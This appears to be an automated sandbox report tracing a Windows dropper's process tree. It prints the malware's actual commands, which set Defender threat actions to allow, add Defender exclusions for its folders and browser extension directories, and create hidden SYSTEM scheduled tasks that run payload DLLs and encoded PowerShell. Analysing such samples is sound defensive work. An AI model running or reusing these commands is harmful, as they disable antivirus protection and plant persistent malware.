C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\wEdTimZ.exeC:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\wEdTimZ.exe ov /Gosite_idwLk 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4764
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1936
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:323⤵PID:4744
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:324⤵PID:932
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:643⤵PID:4116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:323⤵PID:4740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:643⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:323⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:643⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:323⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:643⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:323⤵PID:4956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:643⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hXJwqLKSgMLJYCVB /t REG_DWORD /d 0 /reg:323⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hXJwqLKSgMLJYCVB /t REG_DWORD /d 0 /reg:643⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ /t REG_DWORD /d 0 /reg:323⤵PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ /t REG_DWORD /d 0 /reg:643⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UQvARBrwpbLJoyHM /t REG_DWORD /d 0 /reg:323⤵PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UQvARBrwpbLJoyHM /t REG_DWORD /d 0 /reg:643⤵PID:4756
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXBYXwcFn" /SC once /ST 09:03:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXBYXwcFn"2⤵PID:1404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXBYXwcFn"2⤵PID:2612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdrESRlZGEayfzFZZ" /SC once /ST 05:37:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\NTJmQdD.exe\" xT /Bisite_idAtN 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bdrESRlZGEayfzFZZ"2⤵PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:868
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4648
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3864
-
C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\NTJmQdD.exeC:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\NTJmQdD.exe xT /Bisite_idAtN 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqEFPgBHoYySYAkccD"2⤵PID:3744
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4416
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2312
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:116
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kpvgWGyvU\OuxcAE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "unWYiNUJqAlITwd" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "unWYiNUJqAlITwd2" /F /xml "C:\Program Files (x86)\kpvgWGyvU\PIqJQcl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "unWYiNUJqAlITwd"2⤵PID:1484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "unWYiNUJqAlITwd"2⤵PID:5000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CvAfdqtpQkofiq" /F /xml "C:\Program Files (x86)\BjJZYiuqlPgU2\MYgSrAO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XKFRqCCIaTSsN2" /F /xml "C:\ProgramData\hXJwqLKSgMLJYCVB\QTcJcUc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EwxjatFcEcEtOgckL2" /F /xml "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\WRGnqwQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RKCqzJUCMLcMgcDeikF2" /F /xml "C:\Program Files (x86)\wStPwHPBGQsuC\WhlBkRS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jRVNJXEqUfFueAuNO" /SC once /ST 07:52:03 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UQvARBrwpbLJoyHM\VLPuLoua\kfashfr.dll\",#1 /nTsite_idtgD 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jRVNJXEqUfFueAuNO"2⤵PID:1936
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1868
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3332
-
